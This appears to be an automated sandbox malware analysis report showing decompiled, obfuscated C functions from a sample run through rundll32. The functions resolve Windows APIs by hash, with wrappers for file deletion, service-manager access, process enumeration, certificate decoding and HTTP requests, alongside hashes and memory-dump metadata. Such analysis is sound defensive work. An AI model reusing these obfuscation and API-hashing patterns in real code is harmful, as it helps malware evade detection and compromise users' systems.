SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001D955B

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: 3e2a65e39baf200c2098c68287874ef0152ec39d0429872882ab16e6ce454514
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: 89215675E01208FBEB18DFA5C94AADEBFB5EB44304F10809AF814AB291D3B45B15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D8289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001D8289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E001DE171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E001D606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x001d8290
0x001d8295
0x001d829a
0x001d82a8
0x001d82ab
0x001d82af
0x001d82b5
0x001d82b6
0x001d82bd
0x001d82c4
0x001d82c8
0x001d82cf
0x001d82d6
0x001d82dd
0x001d82e4
0x001d82eb
0x001d82f2
0x001d82f9
0x001d8300
0x001d8307
0x001d8311
0x001d8319
0x001d8332
0x001d833d
0x001d8343

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 001D833D

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: f4f685b9a77fcbc9737f94cd9b0c01e35bb7cb1e4478c8233d6ca717c0abd498
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: 75115B75E0120CFBEB08DFE9C84A5DEBBB5FB58304F108188E410A6264D3B84B09CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001D3296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E001D3296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E001DE171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E001D606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

0x001d329d
0x001d32a0
0x001d32a3
0x001d32a4
0x001d32a9
0x001d32af
0x001d32b3
0x001d32ba
0x001d32c1
0x001d32c8
0x001d32cc
0x001d32d3
0x001d32da
0x001d32e1
0x001d32e5
0x001d32ec
0x001d32f3
0x001d32f7
0x001d32fe
0x001d3305
0x001d3311
0x001d331c
0x001d331f
0x001d333e
0x001d3347
0x001d334d

APIs

SHFileOperationW.SHELL32 ref: 001D3347

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: 600455103e2f0c1814f244199362f85877d82a82848d6f8e35d27a16479eea77
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: E1111671D00219EBEB14DFE4C94AAEEBBB4EB44308F208199E414A7351C3B91B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001E9EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001E9EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E001DE171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E001D606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x001e9ef2
0x001e9ef7
0x001e9efa
0x001e9efb
0x001e9eff
0x001e9f00
0x001e9f05
0x001e9f0f
0x001e9f1b
0x001e9f1e
0x001e9f21
0x001e9f28
0x001e9f2f
0x001e9f36
0x001e9f4d
0x001e9f50
0x001e9f57
0x001e9f5e
0x001e9f65
0x001e9f6c
0x001e9f73
0x001e9f7a
0x001e9f8d
0x001e9f9a
0x001e9fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,001E5A72,0000B2BF), ref: 001E9F9A

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: 41dc99be977c533f149e9f75aaccf4de3e9a1f636ece0b1ffb1019c1b845b674
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: 8911C375D0122DEBDB04DFE9C84A9EEBFB4EF05344F10815AE815A6250D3755B608FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 856 Parent PID: 1472 rundll32.exeCOMMON

Executed Functions

Function 0020A69B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020A69B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t50;
				intOrPtr* _t58;
				void* _t59;

				E001FE171(_t50);
				_v12 = 0xdc7;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff7166;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xfffd885e;
				_v8 = 0xa55a;
				_v8 = _v8 + 0x7cb5;
				_v8 = _v8 | 0xc394f0a6;
				_v8 = _v8 * 0x73;
				_v8 = _v8 ^ 0xdc5c065a;
				_v20 = 0x4a36;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x00005c2f;
				_v16 = 0xe0c4;
				_v16 = _v16 * 0x3f;
				_v16 = _v16 ^ 0x0037356f;
				_t58 = E001F606F(0x10b, 0x3532ca74, __ecx, __ecx, 0xbb4c4a3f);
				_t59 =  *_t58(_a36, _a40, _a16, _a8, _a20, 0, _a24, _a4, __ecx, __edx, _a4, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44); // executed
				return _t59;
			}

0x0020a6c3
0x0020a6c8
0x0020a6d2
0x0020a6db
0x0020a6e2
0x0020a6e6
0x0020a6ed
0x0020a6f4
0x0020a6fb
0x0020a712
0x0020a715
0x0020a71c
0x0020a723
0x0020a727
0x0020a72e
0x0020a739
0x0020a73c
0x0020a74f
0x0020a76e
0x0020a773

APIs

CryptDecodeObjectEx.CRYPT32(?,?,?,0037356F,?,00000000,?,FFFD885E), ref: 0020A76E

Strings

o57, xrefs: 0020A73C

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID: o57
API String ID: 1207547050-2789618358
Opcode ID: 1dcc64bf293a1b605633b1802805251653327ff0236608ceb7b8819db60c0bd6
Instruction ID: 6427c270e534a11ff98a84ef5e0dfb067398316afcbaf05c12f40b6ef6c51773
Opcode Fuzzy Hash: 1dcc64bf293a1b605633b1802805251653327ff0236608ceb7b8819db60c0bd6
Instruction Fuzzy Hash: CA219E7690020DFBDF06DFA4CD469DEBBB6FB18304F108588FA2566260D3769A64EF50

Uniqueness

Uniqueness Score: -1.00%

Function 002075F0, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E002075F0(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, struct _WIN32_FIND_DATAW* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t45;
				void* _t55;
				signed int _t57;
				void* _t61;
				WCHAR* _t62;

				_push(_a16);
				_t62 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001FE171(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xb912f;
				_v16 = 0x3c5b;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x0f16cb47;
				_v12 = 0x201d;
				_t57 = 0x67;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0x1525;
				_v12 = _v12 ^ 0x000060c4;
				_v20 = 0x5621;
				_push(0xe646c375);
				_push(_t57);
				_push(_t57);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x11;
				_v20 = _v20 ^ 0x0005ad04;
				_v8 = 0x7e99;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0xf63dec19;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x7bdfa048;
				_t61 = 0x2f;
				E001F606F(_t61);
				_t55 = FindFirstFileW(_t62, _a16); // executed
				return _t55;
			}

0x002075f7
0x002075fa
0x002075fc
0x002075ff
0x00207602
0x00207606
0x00207607
0x0020760c
0x00207612
0x00207619
0x00207620
0x00207624
0x00207628
0x0020762f
0x0020763b
0x00207641
0x00207644
0x0020764b
0x00207652
0x0020765d
0x00207662
0x00207663
0x00207664
0x00207669
0x0020766c
0x00207673
0x0020767a
0x0020767e
0x00207685
0x00207689
0x0020769e
0x0020769f
0x002076ab
0x002076b1

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,001FCFCB,00000006), ref: 002076AB

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1b33e713a3789f05197475a3a721a29c892895f030733b75049e37504ccbace2
Instruction ID: a64ce40172087d4b1b02ae9b3832f42fa04507dc8bfcb51b09296f33fdb3d835
Opcode Fuzzy Hash: 1b33e713a3789f05197475a3a721a29c892895f030733b75049e37504ccbace2
Instruction Fuzzy Hash: F52124B6D0020DEBDF04DFE4D90A8EEBBB4EB04314F108098E92167241D3B95B68DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0020280B, Relevance: 1.6, APIs: 1, Instructions: 53
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0020280B(void* __ecx, DWORD* _a4, void* _a8, void* _a12, intOrPtr _a16, long _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t47;
				int _t56;
				void* _t59;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001FE171(_t47);
				_v12 = 0xf4aa;
				_v12 = _v12 << 0xb;
				_v12 = _v12 + 0xffff0235;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x52357f4d;
				_v20 = 0xc888;
				_v20 = _v20 << 5;
				_push(0x913736e2);
				_push(0x262cac91);
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x09ca8e36;
				_v16 = 0xc055;
				_v16 = _v16 + 0xffffe255;
				_t59 = 0x6e;
				_v16 = _v16 * 0x2b;
				_v16 = _v16 ^ 0x001b655f;
				_v8 = 0x45b3;
				_v8 = _v8 ^ 0x438f2147;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00006aee;
				E001F606F(_t59);
				_t56 = InternetReadFile(_a12, _a8, _a20, _a4); // executed
				return _t56;
			}

0x00202811
0x00202814
0x00202817
0x0020281a
0x0020281d
0x00202820
0x00202825
0x0020282a
0x00202834
0x00202838
0x0020283f
0x00202843
0x0020284a
0x00202851
0x00202859
0x00202860
0x00202865
0x00202868
0x0020286f
0x00202876
0x00202883
0x00202884
0x00202887
0x0020288e
0x00202895
0x0020289c
0x002028a0
0x002028a4
0x002028b7
0x002028cb
0x002028d0

APIs

InternetReadFile.WININET(09CA8E36,001B655F,?,52357F4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002028CB

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 719739c2baf08ce162dc0a300e926572c2d6b88cf73f502fd3579b889a3d351c
Instruction ID: bbcf5081d4d7d8e6a33cc087be0098fcacd91f032b40a591ed9b25e260dc448e
Opcode Fuzzy Hash: 719739c2baf08ce162dc0a300e926572c2d6b88cf73f502fd3579b889a3d351c
Instruction Fuzzy Hash: 9621E276C0020DFBDF05DFA4C94A8DEBBB2FB14344F108588E924A6261D3B68B65DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00206686, Relevance: 1.5, APIs: 1, Instructions: 43
processCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00206686(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				signed int _t47;

				_v12 = 0x956d;
				_v12 = _v12 << 1;
				_v12 = _v12 + 0xffffe523;
				_v12 = _v12 + 0xf07d;
				_v12 = _v12 ^ 0x00021718;
				_v20 = 0x58ee;
				_v20 = _v20 + 0xf0b1;
				_v20 = _v20 ^ 0x00010871;
				_v16 = 0x7011;
				_t47 = 0x7f;
				_push(_t47);
				_v16 = _v16 * 0x67;
				_v16 = _v16 ^ 0x002d3802;
				_v8 = 0x9843;
				_v8 = _v8 / _t47;
				_v8 = _v8 + 0xffff73cd;
				_v8 = _v8 + 0x606a;
				_v8 = _v8 ^ 0xffffe904;
				E001F606F(0x14a, 0xb6b01ae5, _t47, _t47, 0xdaa7d229);
				_t46 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t46;
			}

0x0020668c
0x00206695
0x00206698
0x0020669f
0x002066a6
0x002066ad
0x002066b4
0x002066bb
0x002066c2
0x002066cf
0x002066d0
0x002066d6
0x002066d9
0x002066e0
0x002066ed
0x002066f5
0x002066fc
0x00206703
0x0020671c
0x00206729
0x0020672e

APIs

CreateToolhelp32Snapshot.KERNEL32(00010871,00000000), ref: 00206729

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: d4fd6f8f33df3e60c4e5d43233582dd6e75459a17c5821c0407e611d9beb3219
Instruction ID: 8ac2087696d2f2892d8f1dc17ebcc04e66180f896d266c5cab02a2840ea0c283
Opcode Fuzzy Hash: d4fd6f8f33df3e60c4e5d43233582dd6e75459a17c5821c0407e611d9beb3219
Instruction Fuzzy Hash: CD1133B1D0030DEBDB44CFE8C84A9AEBBB4EB00304F208198E425A7291E7B86B149F40

Uniqueness

Uniqueness Score: -1.00%

Function 001F10D6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E001F10D6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, void* _a16, char _a24, intOrPtr _a28, void* _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t52;
				int _t61;
				signed int _t63;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001FE171(_t52);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x7806e3;
				_v32 = 0x575fe1;
				_v12 = 0x356e;
				_v12 = _v12 ^ 0xd5127aca;
				_t63 = 0x54;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x028967f2;
				_v8 = 0x61a4;
				_v8 = _v8 << 0xb;
				_v8 = _v8 | 0x6ed09147;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x01bf056a;
				_v20 = 0x8bf1;
				_v20 = _v20 + 0x566b;
				_v20 = _v20 ^ 0x0000ff9c;
				_v16 = 0x530;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x00006b56;
				E001F606F(0x15c, 0x262cac91, _t63, _t63, 0xb55c409);
				_t50 =  &_a24; // 0x575fe1
				_t61 = HttpSendRequestW(_a32,  *_t50, 0xffffffff, _a16, _a12); // executed
				return _t61;
			}

0x001f10dc
0x001f10df
0x001f10e2
0x001f10e5
0x001f10e7
0x001f10ea
0x001f10ed
0x001f10f0
0x001f10f5
0x001f10fa
0x001f1100
0x001f1104
0x001f110b
0x001f1112
0x001f1119
0x001f1125
0x001f1130
0x001f1133
0x001f113a
0x001f1141
0x001f1145
0x001f114c
0x001f1150
0x001f1157
0x001f115e
0x001f1165
0x001f116c
0x001f1173
0x001f1177
0x001f1196
0x001f11a6
0x001f11ac
0x001f11b1

APIs

HttpSendRequestW.WININET(?,_W,000000FF,00000000,0000FF9C), ref: 001F11AC

Strings

_W, xrefs: 001F11A6
kV, xrefs: 001F115E
_W, xrefs: 001F110B
n5, xrefs: 001F1112
Vk, xrefs: 001F1177

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Vk$kV$n5$_W$_W
API String ID: 360639707-3188295959
Opcode ID: c3337840ed23783d657cbeccdd43dbb9a175208f5e060c588b0a1539be38f0e0
Instruction ID: f679c398c05455a23f14198768d2b304e5427c2ff750b0d27919a51b4119587f
Opcode Fuzzy Hash: c3337840ed23783d657cbeccdd43dbb9a175208f5e060c588b0a1539be38f0e0
Instruction Fuzzy Hash: 3021DB7590020DEBDF05DFD4CD4A9DEBBB1FB04314F108298F52466290D7B55A64DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0020353E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E0020353E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t41;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				void* _t59;

				_t59 = __ecx;
				E001FE171(_t41);
				_v36 = 0x4e8f97;
				asm("stosd");
				_t54 = 0x70;
				asm("stosd");
				asm("stosd");
				_v8 = 0x494c;
				_v8 = _v8 * 0x34;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0000d004;
				_v20 = 0x2d67;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x0002f1f8;
				_v16 = 0xc02d;
				_t26 = _t54 + 0x1a; // 0x8a
				_v16 = _v16 / _t54;
				_v16 = _v16 ^ 0x00007993;
				_v12 = 0xb5ab;
				_v12 = _v12 | 0xea6d5014;
				_v12 = _v12 ^ 0xea6dfaed;
				_t51 = E001F606F(_t26, 0xb6b01ae5, _t54, _t54, 0xc3945458);
				_t52 =  *_t51(_a8, 0, _t59, _a16, __ecx, 0, _a4, _a8, _a12, _a16, _a20); // executed
				return _t52;
			}

0x00203549
0x0020355a
0x0020355f
0x0020356d
0x00203570
0x00203574
0x0020357a
0x0020357b
0x0020358d
0x00203590
0x00203594
0x0020359b
0x002035a2
0x002035a6
0x002035ad
0x002035b9
0x002035bc
0x002035bf
0x002035c6
0x002035cd
0x002035d4
0x002035e7
0x002035f8
0x002035ff

APIs

QueryFullProcessImageNameW.KERNEL32(00007993,00000000,A6D32CF7,EE941BD0,?,?,?,?,?,?,?,?,001F37AA,00000000,00000000), ref: 002035F8

Strings

g-, xrefs: 0020359B
LI, xrefs: 0020357B

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID: LI$g-
API String ID: 3578328331-3977910987
Opcode ID: 6ce1ba3b3bf6b0444107e30f7efa050fa6e4697579d1584f3844a1930061ff6b
Instruction ID: 41cbfe873e81c9897bd659741c4393c18d676919f90c790a0d16f2896462b0cb
Opcode Fuzzy Hash: 6ce1ba3b3bf6b0444107e30f7efa050fa6e4697579d1584f3844a1930061ff6b
Instruction Fuzzy Hash: DC211A75D00208FBEF05DF94C8499DEBBB1FF44314F108199E9256B260C7B59A14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00208409, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00208409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001FE171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E001F606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x00208411
0x00208416
0x00208418
0x0020841b
0x0020841e
0x0020841f
0x00208422
0x00208425
0x00208428
0x0020842b
0x0020842c
0x0020842f
0x00208432
0x00208435
0x00208437
0x0020843c
0x00208445
0x00208448
0x00208455
0x00208458
0x0020845f
0x00208462
0x00208469
0x00208470
0x00208474
0x0020847b
0x00208487
0x00208488
0x00208494
0x00208499
0x002084a0
0x002084aa
0x002084b5
0x002084b8
0x002084d7
0x002084ee
0x002084f5

APIs

CreateFileW.KERNEL32(?,?,?,00000000,00006144, document, file,00000000), ref: 002084EE

Strings

document, file, xrefs: 00208435, 002084E0

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: document, file
API String ID: 823142352-3229777078
Opcode ID: 637634e9ca5f09ecfbf418dafc5c0319d1bfc3b194cb6f0e9aca650dbc649f10
Instruction ID: 35bccccba74a6d2f2741b5a916b34b7005fb449ace8a54bef8e66535c4f770a1
